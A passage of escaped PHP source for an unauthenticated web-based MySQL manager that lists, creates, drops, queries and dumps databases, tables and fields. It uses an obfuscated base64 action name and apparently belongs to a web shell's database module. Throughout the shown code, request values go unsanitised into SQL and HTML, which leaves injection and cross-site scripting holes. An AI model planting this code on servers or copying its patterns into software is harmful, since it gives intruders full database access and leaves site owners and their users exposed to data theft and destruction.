\"<table cellpadding=5>\\n\";\r\n\t\techo \"<tr><td>Query</td><td>\$queryStr</td></tr>\\n\";\r\n\t\techo \"<tr><td>Result</td><td>\$errMsg</td></tr>\\n\";\r\n\t\techo \"</table><p>\\n\";\r\n\t}\r\n}\r\n\r\nfunction listDatabases() {\r\n\tglobal \$mysqlHandle, \$PHP_SELF;\r\n\techo \"<h1>Databases List</h1>\\n\";\r\n\techo \"<form action='\$PHP_SELF'>\\n\";\r\n\techo \"<input type=hidden name=action value=createDB>\\n\";\r\n\techo \"<input type=text name=dbname>\\n\";\r\n\techo \"<input type=submit value='Create Database'>\\n\";\r\n\techo \"</form>\\n\";\r\n\techo \"<hr>\\n\";\r\n\techo \"<table cellspacing=1 cellpadding=5>\\n\";\r\n\t\$pDB = mysql_list_dbs( \$mysqlHandle );\r\n\t\$num = mysql_num_rows( \$pDB );\r\n\tfor( \$i = 0; \$i < \$num; \$i++ ) {\r\n\t\t\$dbname = mysql_dbname( \$pDB, \$i );\r\n\t\techo \"<tr>\\n\";\r\n\t\techo \"<td>\$dbname</td>\\n\";\r\n\t\techo \"<td><a href='\$PHP_SELF?action=listTables&dbname=\$dbname'>Tables</a></td>\\n\";\r\n\t\techo \"<td><a href='\$PHP_SELF?action=dropDB&dbname=\$dbname' onClick=\\\"return confirm('Drop Database \\'\$dbname\\'?')\\\">Drop</a></td>\\n\";\r\n\t\techo \"<td><a href='\$PHP_SELF?action=dumpDB&dbname=\$dbname' onClick=\\\"return confirm('Dump Database \\'\$dbname\\'?')\\\">Dump</a></td>\\n\";\r\n\t\techo \"</tr>\\n\";\r\n\t}\r\n\techo \"</table>\\n\";\r\n}\r\n\r\nfunction createDatabase() {\r\n\tglobal \$mysqlHandle, \$dbname, \$PHP_SELF;\r\n\tmysql_create_db( \$dbname, \$mysqlHandle );\r\n\tlistDatabases();\r\n}\r\n\r\nfunction dropDatabase() {\r\n\tglobal \$mysqlHandle, \$dbname, \$PHP_SELF;\r\n\tmysql_drop_db( \$dbname, \$mysqlHandle );\r\n\tlistDatabases();\r\n}\r\n\r\nfunction listTables() {\r\n\tglobal \$mysqlHandle, \$dbname, \$PHP_SELF;\r\n\techo \"<h1>Tables List</h1>\\n\";\r\n\techo \"<p class=location>\$dbname</p>\\n\";\r\n\techoQueryResult();\r\n\techo \"<form action='\$PHP_SELF'>\\n\";\r\n\techo \"<input type=hidden name=action value=createTable>\\n\";\r\n\techo \"<input type=hidden name=dbname value=\$dbname>\\n\";\r\n\techo \"<input type=text name=tablename>\\n\";\r\n\techo \"<input type=submit value='Create Table'>\\n\";\r\n\techo \"</form>\\n\";\r\n\techo \"<form action='\$PHP_SELF'>\\n\";\r\n\techo \"<input type=hidden name=action value=query>\\n\";\r\n\techo \"<input type=hidden name=dbname value=\$dbname>\\n\";\r\n\techo \"<input type=text size=120 name=queryStr>\\n\";\r\n\techo \"<input type=submit value='Query'>\\n\";\r\n\techo \"</form>\\n\";\r\n\techo \"<hr>\\n\";\r\n\t\$pTable = mysql_list_tables( \$dbname );\r\n\tif( \$pTable == 0 ) {\r\n\t\t\$msg  = mysql_error();\r\n\t\techo \"<h3>Error : \$msg</h3><p>\\n\";\r\n\t\treturn;\r\n\t}\r\n\t\$num = mysql_num_rows( \$pTable );\r\n\techo \"<table cellspacing=1 cellpadding=5>\\n\";\r\n\tfor( \$i = 0; \$i < \$num; \$i++ ) {\r\n\t\t\$tablename = mysql_tablename( \$pTable, \$i );\r\n\t\techo \"<tr>\\n\";\r\n\t\techo \"<td>\\n\";\r\n\t\techo \"\$tablename\\n\";\r\n\t\techo \"</td>\\n\";\r\n\t\techo \"<td>\\n\";\r\n\t\techo \"<a href='\$PHP_SELF?action=viewSchema&dbname=\$dbname&tablename=\$tablename'>Schema</a>\\n\";\r\n\t\techo \"</td>\\n\";\r\n\t\techo \"<td>\\n\";\r\n\t\techo \"<a href='\$PHP_SELF?action=dmlld0RhdGE=&dbname=\$dbname&tablename=\$tablename'>Data</a>\\n\";\r\n\t\techo \"</td>\\n\";\r\n\t\techo \"<td>\\n\";\r\n\t\techo \"<a href='\$PHP_SELF?action=dropTable&dbname=\$dbname&tablename=\$tablename' onClick=\\\"return confirm('Drop Table \\'\$tablename\\'?')\\\">Drop</a>\\n\";\r\n\t\techo \"</td>\\n\";\r\n\t\techo \"<td>\\n\";\r\n\t\techo \"<a href='\$PHP_SELF?action=dumpTable&dbname=\$dbname&tablename=\$tablename' onClick=\\\"return confirm('Dump Table \\'\$tablename\\'?')\\\">Dump</a>\\n\";\r\n\t\techo \"</td>\\n\";\r\n\t\techo \"</tr>\\n\";\r\n\t}\r\n\techo \"</table>\";\r\n}\r\n\r\nfunction createTable() {\r\n\r\n\tglobal \$mysqlHandle, \$dbname, \$tablename, \$PHP_SELF, \$queryStr, \$errMsg;\r\n\t\$queryStr = \"CREATE TABLE \$tablename ( no INT )\";\r\n\tmysql_select_db( \$dbname, \$mysqlHandle );\r\n\tmysql_query( \$queryStr, \$mysqlHandle );\r\n\t\$errMsg = mysql_error();\r\n\tlistTables();\r\n}\r\n\r\nfunction dropTable() {\r\n\tglobal \$mysqlHandle, \$dbname, \$tablename, \$PHP_SELF, \$queryStr, \$errMsg;\r\n\t\$queryStr = \"DROP TABLE \$tablename\";\r\n\tmysql_select_db( \$dbname, \$mysqlHandle );\r\n\tmysql_query( \$queryStr, \$mysqlHandle );\r\n\t\$errMsg = mysql_error();\r\n\tlistTables();\r\n}\r\n\r\nfunction viewSchema() {\r\n\tglobal \$mysqlHandle, \$dbname, \$tablename, \$PHP_SELF, \$queryStr, \$errMsg;\r\n\techo \"<h1>Table Schema</h1>\\n\";\r\n\techo \"<p class=location>\$dbname &gt; \$tablename</p>\\n\";\r\n\techoQueryResult();\r\n\techo \"<a href='\$PHP_SELF?action=addField&dbname=\$dbname&tablename=\$tablename'>Add Field</a> | \\n\";\r\n\techo \"<a href='\$PHP_SELF?action=dmlld0RhdGE=&dbname=\$dbname&tablename=\$tablename'>View Data</a>\\n\";\r\n\techo \"<hr>\\n\";\r\n\t\$pResult = mysql_db_query( \$dbname, \"SHOW fields FROM \$tablename\" );\r\n\t\$num = mysql_num_rows( \$pResult );\r\n\techo \"<table cellspacing=1 cellpadding=5>\\n\";\r\n\techo \"<tr>\\n\";\r\n\techo \"<th>Field</th>\\n\";\r\n\techo \"<th>Type</th>\\n\";\r\n\techo \"<th>Null</th>\\n\";\r\n\techo \"<th>Key</th>\\n\";\r\n\techo \"<th>Default</th>\\n\";\r\n\techo \"<th>Extra</th>\\n\";\r\n\techo \"<th colspan=2>Action</th>\\n\";\r\n\techo \"</tr>\\n\";\r\n\r\n\tfor( \$i = 0; \$i < \$num; \$i++ ) {\r\n\t\t\$field = mysql_fetch_array( \$pResult );\r\n\t\techo \"<tr>\\n\";\r\n\t\techo \"<td>\".\$field[\"Field\"].\"</td>\\n\";\r\n\t\techo \"<td>\".\$field[\"Type\"].\"</td>\\n\";\r\n\t\techo \"<td>\".\$field[\"Null\"].\"</td>\\n\";\r\n\t\techo \"<td>\".\$field[\"Key\"].\"</td>\\n\";\r\n\t\techo \"<td>\".\$field[\"Default\"].\"</td>\\n\";\r\n\t\techo \"<td>\".\$field[\"Extra\"].\"</td>\\n\";\r\n\t\t\$fieldname = \$field[\"Field\"];\r\n\t\techo \"<td><a href='\$PHP_SELF?action=editField&dbname=\$dbname&tablename=\$tablename&fieldname=\$fieldname'>Edit</a></td>\\n\";\r\n\t\techo \"<td><a href='\$PHP_SELF?action=dropField&dbname=\$dbname&tablename=\$tablename&fieldname=\$fieldname' onClick=\\\"return confirm('Drop Field \\'\$fieldname\\'?')\\\">Drop</a></td>\\n\";\r\n\t\techo \"</tr>\\n\";\r\n\t}\r\n\techo \"</table>\\n\";\r\n}\r\n\r\nfunction manageField( \$cmd ) {\r\n\tglobal \$mysqlHandle, \$dbname, \$tablename, \$fieldname, \$PHP_SELF;\r\n\tif( \$cmd == \"add\" )\r\n\t\techo \"<h1>Add Field</h1>\\n\";\r\n\telse if( \$cmd == \"edit\" ) {\r\n\t\techo \"<h1>Edit Field</h1>\\n\";\r\n\t\t\$pResult = mysql_db_query( \$dbname, \"SHOW fields FROM \$tablename\" );\r\n\t\t\$num = mysql_num_rows( \$pResult );\r\n\t\tfor( \$i = 0; \$i < \$num; \$i++ ) {\r\n\t\t\t\$field = mysql_fetch_array( \$pResult );\r\n\t\t\tif( \$field[\"Field\"] == \$fieldname ) {\r\n\t\t\t\t\$fieldtype = \$field[\"Type\"];\r\n\t\t\t\t\$fieldkey = \$field[\"Key\"];\r\n\t\t\t\t\$fieldextra = \$field[\"Extra\"];\r\n\t\t\t\t\$fieldnull = \$field[\"Null\"];\r\n\t\t\t\t\$fielddefault = \$field[\"Default\"];\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\t\$type = strtok( \$fieldtype, \" (,)\\n\" );\r\n\t\tif( strpos( \$fieldtype, \"(\" ) ) {\r\n\t\t\tif( \$type == \"enum\" | \$type == \"set\" ) {\r\n\t\t\t\t\$valuelist = strtok( \" ()\\n\" );\r\n\t\t\t} else {\r\n\t\t\t\t\$M = strtok( \" (,)\\n\" );\r\n\t\t\t\tif( strpos( \$fieldtype, \",\" ) )\r\n\t\t\t\t\t\$D = strtok( \" (,)\\n\" );\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\techo \"<p class=location>\$dbname &gt; \$tablename</p>\\n\";\r\n\techo \"<form action=\$PHP_SELF>\\n\";\r\n\tif( \$cmd == \"add\" )\r\n\t\techo \"<input type=hidden name=action value=addField_submit>\\n\";\r\n\telse if( \$cmd == \"edit\" ) {\r\n\t\techo \"<input type=hidden name=action value=editField_submit>\\n\";\r\n\t\techo \"<input type=hidden name=old_name value=\$fieldname>\\n\";\r\n\t}\r\n\techo \"<input type=hidden name=dbname value=\$dbname>\\n\";\r\n\techo \"<input type=hidden name=tablename value=\$tablename>\\n\";\r\n\techo \"<h3>Name</h3>\\n\";\r\n\techo \"<input type=text name=name value=\$fieldname><p>\\n\";\r\n\techo '\r\n\r\n<h3>Type</h3>\r\n<font size=2 class=\"new\">\r\n* `M\\' indicates the maximum display size.<br>\r\n* `D\\' applies to floating-point types and indicates the number of digits following the decimal point.<br>\r\n</font>\r\n<table>\r\n<tr>\r\n<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"TINYINT\" '; if( \$type == \"tinyint\" ) echo \"checked\";echo '>TINYINT (-128 ~ 127)</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td align=center>O</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"SMALLINT\" '; if( \$type == \"smallint\" ) echo \"checked\";echo '>SMALLINT (-32768 ~ 32767)</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td align=center>O</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"MEDIUMINT\" '; if( \$type == \"mediumint\" ) echo \"checked\";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td align=center>O</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"INT\" '; if( \$type == \"int\" ) echo \"checked\";echo '>INT (-2147483648 ~ 2147483647)</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td align=center>O</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"BIGINT\" '; if( \$type == \"bigint\" ) echo \"checked\";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td align=center>O</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"FLOAT\" '; if( \$type == \"float\" ) echo \"checked\";echo '>FLOAT</td>\r\n<td align=center>O</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"DOUBLE\" '; if( \$type == \"double\" ) echo \"checked\";echo '>DOUBLE</td>\r\n<td align=center>O</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"DECIMAL\" '; if( \$type == \"decimal\" ) echo \"checked\";echo '>DECIMAL(NUMERIC)</td>\r\n<td align=center>O</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"DATE\" '; if( \$type == \"date\" ) echo \"checked\";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"DATETIME\" '; if( \$type == \"datetime\" ) echo \"checked\";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"TIMESTAMP\" '; if( \$type == \"timestamp\" ) echo \"checked\";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"TIME\" '; if( \$type == \"time\" ) echo \"checked\";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"YEAR\" '; if( \$type == \"year\" ) echo \"checked\";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"CHAR\" '; if( \$type == \"char\" ) echo \"checked\";echo '>CHAR</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td align=center>O</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"VARCHAR\" '; if( \$type == \"varchar\" ) echo \"checked\";echo '>VARCHAR</td>\r\n<td align=center>O</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td align=center>O</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"TINYTEXT\" '; if( \$type == \"tinytext\" ) echo \"checked\";echo '>TINYTEXT (0 ~ 255)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"TEXT\" '; if( \$type == \"text\" ) echo \"checked\";echo '>TEXT (0 ~ 65535)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"MEDIUMTEXT\" '; if( \$type == \"mediumtext\" ) echo \"checked\";echo '>MEDIUMTEXT (0 ~ 16777215)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"LONGTEXT\" '; if( \$type == \"longtext\" ) echo \"checked\";echo '>LONGTEXT (0 ~ 4294967295)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"TINYBLOB\" '; if( \$type == \"tinyblob\" ) echo \"checked\";echo '>TINYBLOB (0 ~ 255)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"BLOB\" '; if( \$type == \"blob\" ) echo \"checked\";echo '>BLOB (0 ~ 65535)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"MEDIUMBLOB\" '; if( \$type == \"mediumblob\" ) echo \"checked\";echo '>MEDIUMBLOB (0 ~ 16777215)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"LONGBLOB\" '; if( \$type == \"longblob\" ) echo \"checked\";echo '>LONGBLOB (0 ~ 4294967295)</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n<td>&nbsp</td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"ENUM\" '; if( \$type == \"enum\" ) echo \"checked\";echo '>ENUM</td>\r\n<td colspan=5><center>value list</center></td>\r\n</tr>\r\n<tr>\r\n<td><input type=radio name=type value=\"SET\" '; if( \$type == \"set\" ) echo \"checked\";echo '>SET</td>\r\n<td colspan=5><center>value list</center></td>\r\n</tr>\r\n</table>\r\n<table>\r\n<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \\'apple\\', \\'orange\\', \\'banana\\') </th></tr>\r\n<tr>\r\n<td align=center><input type=text size=4 name=M '; if( \$M != \"\" ) echo \"value=\$M\";echo '></td>\r\n<td align=center><input type=text size=4 name=D '; if( \$D != \"\" ) echo \"value=\$D\";echo '></td>\r\n<td align=center><input type=checkbox name=unsigned value=\"UNSIGNED\" '; if( strpos( \$fieldtype, \"unsigned\" ) ) echo \"checked\";echo '></td>\r\n<td align=center><input type=checkbox name=zerofill value=\"ZEROFILL\" '; if( strpos( \$fieldtype, \"zerofill\" ) ) echo \"checked\";echo '></td>\r\n<td align=center><input type=checkbox name=binary value=\"BINARY\" '; if( strpos( \$fieldtype, \"binary\" )  ) echo \"checked\";echo '></td>\r\n<td align=center><input type=text size=60 name=valuelist '; if( \$valuelist != \"\" ) echo \"value=\\\"\$valuelist\\\"\";echo '></td>\r\n</tr>\r\n</table>\r\n<h3>Flags</h3>\r\n<table>\r\n<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>\r\n<tr>\r\n<td align=center><input type=checkbox name=not_null value=\"NOT NULL\" '; if( \$fieldnull != \"YES\" ) echo \"checked\";echo '></td>\r\n<td align=center><input type=text name=default_value '; if( \$fielddefault != \"\" ) echo \"value=\$fielddefault\";echo '></td>\r\n<td align=center><input type=checkbox name=auto_increment value=\"AUTO_INCREMENT\" '; if( \$fieldextra == \"auto_increment\" ) echo \"checked\";echo '></td>\r\n<td align=center><input type=checkbox name=primary_key value=\"PRIMARY KEY\" '; if( \$fieldkey == \"PRI\" ) echo \"checked\";echo '></td>\r\n</tr>\r\n</table>\r\n<p>';\r\n\tif( \$cmd == \"add\" )\r\n\t\techo \"<input type=submit value='Add Field'>\\n\";\r\n\telse if( \$cmd == \"edit\" )\r\n\t\techo \"<input type=submit value='Edit Field'>\\n\";\r\n\techo \"<input type=button value=Cancel onClick='history.back()'>\\n\";\r\n\techo \"</form>\\n\";\r\n}\r\n\r\nfunction manageField_submit( \$cmd ) {\r\n\tglobal \$mysqlHandle, \$dbname, \$tablename, \$old_name, \$name, \$type, \$PHP_SELF, \$queryStr, \$errMsg,\r\n\t\t\$M, \$D, \$unsigned, \$zerofill, \$binary, \$not_null, \$default_value, \$auto_increment, \$primary_key, \$valuelist;\r\n\tif( \$cmd == \"add\" )\r\n\t\t\$queryStr = \"ALTER TABLE \$tablename ADD \$name \";\r\n\telse if( \$cmd == \"edit\" )\r\n\t\t\$queryStr = \"ALTER TABLE \$tablename CHANGE \$old_name \$name \";\r\n\tif( \$M != \"\" )\r\n\t\tif( \$D != \"\" )\r\n\t\t\t\$queryStr .= \"\$type(\$M,\$D) \";\r\n\t\telse\r\n\t\t\t\$queryStr .= \"\$type(\$M) \";\r\n\telse if( \$valuelist != \"\" ) {\r\n\t\t\$valuelist = stripslashes( \$valuelist );\r\n\t\t\$queryStr .= \"\$type(\$valuelist) \";\r\n\t} else\r\n\t\t\$queryStr .= \"\$type \";\r\n\t\$queryStr .= \"\$unsigned \$zerofill \$binary \";\r\n\tif( \$default_value != \"\" )\r\n\t\t\$queryStr .= \"DEFAULT '\$default_value' \";\r\n\t\$queryStr .= \"\$not_null \$auto_increment\";\r\n\tmysql_select_db( \$dbname, \$mysqlHandle );\r\n\tmysql_query( \$queryStr, \$mysqlHandle );\r\n\t\$errMsg = mysql_error();\r\n\t// key change\r\n\t\$keyChange = false;\r\n\t\$result = mysql_query( \"SHOW KEYS FROM \$tablename\" );\r\n\t\$primary = \"\";\r\n\twhile( \$row = mysql_fetch_array(\$result) )\r\n\t\tif( \$row[\"Key_name\"] == \"PRIMARY\" ) {\r\n\t\t\tif( \$row[Column_name] == \$name )\r\n\t\t\t\t\$keyChange = true;\r\n\t\t\telse\r\n\t\t\t\t\$primary .= \", \$row[Column_name]\";\r\n\t\t}\r\n\tif( \$primary_key == \"PRIMARY KEY\" ) {\r\n\t\t\$primary .= \", \$name\";\r\n\t\t\$keyChange = !\$keyChange;\r\n\t}\r\n\t\$primary = substr( \$primary, 2 );\r\n\tif( \$keyChange == true ) {\r\n\t\t\$q = \"ALTER TABLE \$tablename DROP PRIMARY KEY\";\r\n\t\tmysql_query( \$q );\r\n\t\t\$queryStr .= \"<br>\\n\" . \$q;\r\n\t\t\$errMsg .= \"<br>\\n\" . mysql_error();\r\n\t\t\$q = \"ALTER TABLE \$tablename ADD PRIMARY KEY( \$primary )\";\r\n\t\tmysql_query( \$q );\r\n\t\t\$queryStr .= \"<br>\\n\" . \$q;\r\n\t\t\$errMsg .= \"<br>\\n\" . mysql_error();\r\n\t}\r\n\tviewSchema();\r\n}\r\n\r\nfunction dropField() {\r\n\tglobal \$mysqlHandle, \$dbname, \$tablename, \$fieldname, \$PHP_SELF, \$queryStr, \$errMsg;\r\n\t\$queryStr = \"ALTER TABLE \$tablename DROP COLUMN \$fieldname\";\r\n\tmysql_select_db( \$dbname, \$mysqlHandle );\r\n\tmysql_query( \$queryStr , \$mysqlHandle );\r\n\t\$errMsg = mysql_error();\r\n\tviewSchema();\r\n}\r\n\r\nfunction viewData( \$queryStr ) {\r\n\tglobal \$action, \$mysqlHandle, \$dbname, \$tablename, \$PHP_SELF, \$errMsg, \$page, \$rowperpage, \$orderby;\r\n\techo \"<h1>Data in Table</h1>\\n\";\r\n\tif( \$tablename != \"\" )\r\n\t\techo \"<p class=location>\$dbname &gt; \$tablename</p>\\n\";\r\n\telse\r\n\t\techo \"<p class=location>\$dbname</p>\\n\";\r\n\t\$queryStr = stripslashes( \$queryStr );\r\n\tif( \$queryStr == \"\" ) {\r\n\t\t\$queryStr = \"SELECT * FROM \$tablename\";\r\n\t\tif( \$orderby != \"\" )\r\n\t\t\t\$queryStr .= \" ORDER BY \$orderby\";\r\n\t\techo \"<a href='\$PHP_SELF?action=addData&dbname=\$dbname&tablename=\$tablename'>Add Data</a> | \\n\";\r\n\t\techo \"<a href='\$PHP_SELF?action=viewSchema&dbname=\$dbname&tablename=\$tablename'>Schema</a>\\n\";\r\n\t}\r\n\t\$pResult = mysql_db_query( \$dbname, \$queryStr );\r\n\t\$fieldt = mysql_fetch_field(\$pResult);\r\n\t\$tablename = \$fieldt->table;\r\n\t\$errMsg = mysql_error();\r\n\t\$GLOBALS[queryStr] = \$queryStr;\r\n\tif( \$pResult == false ) {\r\n\t\techoQueryResult();\r\n\t\treturn;\r\n\t}\r\n\tif( \$pResult == 1 ) {\r\n\t\t\$errMsg = \"Success\";\r\n\t\techoQueryResult();\r\n\t\treturn;\r\n\t}\r\n\techo \"<hr>\\n\";\r\n\t\$row = mysql_num_rows( \$pResult );\r\n\t\$col = mysql_num_fields( \$pResult );\r\n\tif( \$row == 0 ) {\r\n\t\techo \"No Data Exist!\";\r\n\t\treturn;\r\n\t}\r\n\tif( \$rowperpage == \"\" ) \$rowperpage = 30;\r\n\tif( \$page == \"\" ) \$page = 0;\r\n\telse \$page--;\r\n\tmysql_data_seek( \$pResult, \$page * \$rowperpage );\r\n\techo \"<table cellspacing=1 cellpadding=2>\\n\";\r\n\techo \"<tr>\\n\";\r\n\tfor( \$i = 0; \$i < \$col; \$i++ ) {\r\n\t\t\$field = mysql_fetch_field( \$pResult, \$i );\r\n\t\techo \"<th>\";\r\n\t\tif(\$action == \"dmlld0RhdGE=\")\r\n\t\t\techo \"<a href='\$PHP_SELF?action=dmlld0RhdGE=&dbname=\$dbname&tablename=\$tablename&orderby=\".\$field->name.\"'>\".\$field->name.\"</a>\\n\";\r\n\t\telse\r\n\t\t\techo \$field->name.\"\\n\";\r\n\t\techo \"</th>\\n\";\r\n\t}\r\n\techo \"<th colspan=2>Action</th>\\n\";\r\n\techo \"</tr>\\n\";\r\n\tfor( \$i = 0; \$i < \$rowperpage; \$i++ ) {\r\n\t\t\$rowArray = mysql_fetch_row( \$pResult );\r\n\t\tif( \$rowArray == false ) break;\r\n\t\techo \"<tr>\\n\";\r\n\t\t\$key = \"\";\r\n\t\tfor( \$j = 0; \$j < \$col; \$j++ ) {\r\n\t\t\t\$data = \$rowArray[\$j];\r\n\t\t\t\$field = mysql_fetch_field( \$pResult, \$j );\r\n\t\t\tif( \$field->primary_key == 1 )\r\n\t\t\t\t\$key .= \"&\" . \$field->name . \"=\" . \$data;\r\n\t\t\tif( strlen( \$data ) > 30 )\r\n\t\t\t\t\$data = substr( \$data, 0, 30 ) . \"...\";\r\n\t\t\t\$data = htmlspecialchars( \$data );\r\n\t\t\techo \"<td>\\n\";\r\n\t\t\techo \"\$data\\n\";\r\n\t\t\techo \"</td>\\n\";\r\n\t\t}\r\n\t\tif( \$key == \"\" )\r\n\t\t\techo \"<td colspan=2>no Key</td>\\n\";\r\n\t\telse {\r\n\t\t\techo \"<td><a href='\$PHP_SELF?action=editData\$key&dbname=\$dbname&tablename=\$tablename'>Edit</a></td>\\n\";\r\n\t\t\techo \"<td><a href='\$PHP_SELF?action=deleteData\$key&dbname=\$dbname&tablename=\$tablename' onClick=\\\"return confirm('Delete Row?')\\\">Delete</a></td>\\n\";\r\n\t\t}\r\n\t\techo \"</tr>\\n\";\r\n\t}\r\n\techo \"</table>\\n\";\r\n\techo \"<font size=2 class=\\\"new\\\">\\n\";\r\n\tif(\$action == \"dmlld0RhdGE=\")\r\n\t\techo \"<form action='\$PHP_SELF?action=dmlld0RhdGE=&dbname=\$dbname&tablename=\$tablename' method=post>\\n\";\r\n\telse\r\n\t\techo \"<form action='\$PHP_SELF?action=query&dbname=\$dbname&tablename=\$tablename&queryStr=\$queryStr' method=post>\\n\";\r\n\techo (\$page+1).\"/\".(int)(\$row/\$rowperpage+1).\" page\";\r\n\techo \"</font>\\n\";\r\n\techo \" | \";\r\n\tif( \$page > 0 ) {\r\n\t\tif(\$action == \"dmlld0RhdGE=\")\r\n\t\t\techo \"<a href='\$PHP_SELF?action=dmlld0RhdGE=&dbname=\$dbname&tablename=\$tablename&page=\".(\$page);\r\n\t\telse\r\n\t\t\techo \"<a href='\$PHP_SELF?action=query&dbname=\$dbname&tablename=\$tablename&queryStr=\$queryStr&page=\".(\$page);\r\n\t\tif( \$orderby != \"\" && \$action == \"dmlld0RhdGE=\")\r\n\t\t\techo \"&orderby=\$orderby\";\r\n\t\techo \"'>Prev</a>\\n\";\r\n\t} else\r\n\t\techo \"<font size=2 class=\\\"new\\\">Prev</font>\";\r\n\techo \" | \";\r\n\tif( \$page < (\$row/\$rowperpage)-1 ) {\r\n\t\tif(\$action == \"dmlld0RhdGE=\")\r\n\t\t\techo \"<a href='\$PHP_SELF?action=dmlld0RhdGE=&dbname=\$dbname&tablename=\$tablename&page=\".(\$page+2);\r\n\t\telse\r\n\t\t\techo \"<a href='\$PHP_SELF?action=query&dbname=\$dbname&tablename=\$tablename&queryStr=\$queryStr&page=\".(\$page+2);\r\n\t\tif( \$orderby != \"\" && \$action == \"dmlld0RhdGE=\")\r\n\t\t\techo \"&orderby=\$orderby\";\r\n\t\techo \"'>Next</a>\\n\";\r\n\t} else\r\n\t\techo \"Next\";\r\n\techo \" | \";\r\n\tif( \$row > \$rowperpage ) 